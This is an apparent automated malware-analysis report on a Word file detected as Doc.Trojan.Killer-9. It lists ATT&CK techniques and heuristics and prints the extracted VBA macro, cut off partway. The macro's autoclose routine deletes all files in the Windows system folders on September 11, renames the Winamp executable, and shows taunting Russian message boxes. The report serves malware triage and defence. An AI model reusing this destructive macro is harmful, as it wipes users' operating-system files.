MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1491.001 Defacement: Content Spoofing
T1070.004 File Deletion
T1564.001 Hidden Files and Directories
The sample contains a VBA macro with an Auto_Close subroutine, which is a common technique for executing malicious code upon document closure. The script attempts to delete files from Windows directories and rename a legitimate executable, indicating destructive or disruptive intent. The messages displayed to the user are also indicative of a trojan, possibly attempting to mislead or taunt the user.
Heuristics 5
-
ClamAV: Doc.Trojan.Killer-9 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Killer-9
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9063 bytes |
SHA-256: 4276018ccd0fa5e48cfd502dff28d0830cbff8b291ce30b7be9fc3258bd47b2b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Declare Function mciSendString Lib "winmm.dll" _
Alias "mciSendStringA" (ByVal lpstrCommand As String, _
ByVal lpstrReturnString As String, ByVal uReturnLength As Long, _
ByVal hwndCallback As Long) As Long
Sub autoclose()
On Error Resume Next
If Month(Now()) = 9 And Day(Now()) = 11 Then
Kill "C:\WINDOWS\*.*"
Kill "C:\WINDOWS\system32\*.*"
Kill "C:\WINDOWS\system\*.*"
MsgBox "-------НЕУДАЧНЫЙ ДЕНЬ--------", vbCritical, "GAME OVER"
Else
If Month(Now()) = Day(Now()) Then
OldName = "C:\Program Files\Winamp\winamp.exe"
NewName = "C:\Program Files\Winamp\winamp.dll"
Name OldName As NewName
MsgBox " Невожможно закрыть Microsoft Word ", vbCritical, "Error"
MsgBox " WARNING!!! Virus Alert ", vbExclamation
MsgBox " Обнаружен вирус Trojan.Apokalipse.990eERR", vbCritical
MsgBox " RSXCЪХЪЖХ}>}{}::P_p][p-BHG}{LPJBG(&*(&%*(*&^)UgyuFRCHGVFMPK)J?>HYt"
MsgBox " Hi, Lamer !!! }:}:>}:L{>{:}{:|}:}{L{LLL}L}", 0, "For Lamer"
MsgBox " My Name is Debuger ", vbInformation, "Debuger"
MsgBox " Хочешь закрыть Word??? ", 4, "Debuger"
MsgBox " Чего мучаешся, Hacker галимый @@@@@@@@@@@@@@@@@@@@@@@@____________", 5, "Debuger"
MsgBox " Я вижу у тебя винда нелицензионная (:(:(:(:(:(:(:(:(:(: ", 0, "Debuger"
MsgBox "............и проги пиратские............................................", 0, "Debuger"
MsgBox " Да ты ещё музло бесплатно слушаешьХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХ", o, "Debuger"
MsgBox " ПИРАТСТВУ------------БОЙ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ", 3, "Debuger"
MsgBox " Сколько можно жать ОК?][;]=;];=[;.]l;][;];] ", vbQuestion, "Debuger"
MsgBox " ];]=90=9 На компе много ДЕРЬМА ", vbExclamation, "Debuger"
MsgBox "+++++++Gih Прочистим мозги", 2, "Debuger"
MsgBox " gvycgdevccvvuebvfuvcbidcdhcvhjfbdfverbvhdfbvkfbvierbvhbvjkdfvnoerghuerionvfjkefvyuidfubvdfjvnuifbvkdfbvdkfvnonflvncjkfvnjkfdbvjkdfbvkdfjvnfjvbkjbvuivnuiervervyucvrycbicvyurcbuecvrcbuybcirbibvfiriebvuerbvierburbvuierncvruifnuierbfverubfveruobvierbvfuirvnuirencvoeruveruibverbvurbuirnfvornfvoerbvroebvoerbviorbvioerbvfiorbvoribvoribvfrobvrbviorebfriwebfrobvfrebvernvriovfnerofnvgeriogeyfrfjriofhuierfhукенг4ен45гео5щзеш9045негш5рагшпнгкацалукпаклалдукрпгшуимукмшщутмзщукмлщзукаомщзукпошщукрпущкпвсмцуенчмцугчмцугтчшцусишцусишцувшщцумаецумвуоварукаьпармкукрпгшукткщмьакрскнцаицукаиукшциаукшипвасросикрсммаируксмтииамрамолватмолпаимгпруеимшимолмтолпаимитмшваипмним ариммишимраимимримримароимримрогаимроваимроимимрваимроаимроваимолваимроваимимроимроваимроиамроваимроаимроваимрмуаолмтшщукатукшщмукгшимугпампасвфывпрчсфыачмвпрсмвмсгуисукиаукцрсиукгисуксиксиушксишксткрмпапмсгкцумснгксмцукгисрогцукисукрсикотсшцукрсицукгсикимасисшцкиксмукрцсикшцурукимааиксишцуксиукгсиушкроимаугшмикущмукшщиммщуктмщ", vbCritical, "Debuger"
MsgBox "тЫ мНе НаДоЕл", 3, "Debuger"
MsgBox "___________________________________________________И комп у тебя отстой____________________________________", o, "Debuger"
MsgBox " Пока ты фигнёй страдал твоё пиратское Гавно смылось в Унитаз", vbInformation, "Debuger"
MsgBox " URA!!! URA!!! URA!!! ", 0, "Debuger"
MsgBox "NJ тО ЛИ ещё будет///////////////////////////////", 2, "Debuger"
MsgBox "----ХОРОШИЙ ВИНТ-ЧИСТЫЙ ВИНТ----", vbCritical, "Format\: C"
MsgBox " Ну вот и началось самое Интересное", vbInformation, "Debuger"
Else
MsgBox " Невожможно закрыть Microsoft Word ", vbCritical, "Error"
MsgBox " WARNING!!! Virus Alert ", vbExclamation
MsgBox " Обнаружен вирус Trojan.Apokalipse.990eERR", vbCritical
MsgBox " RSXCЪ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.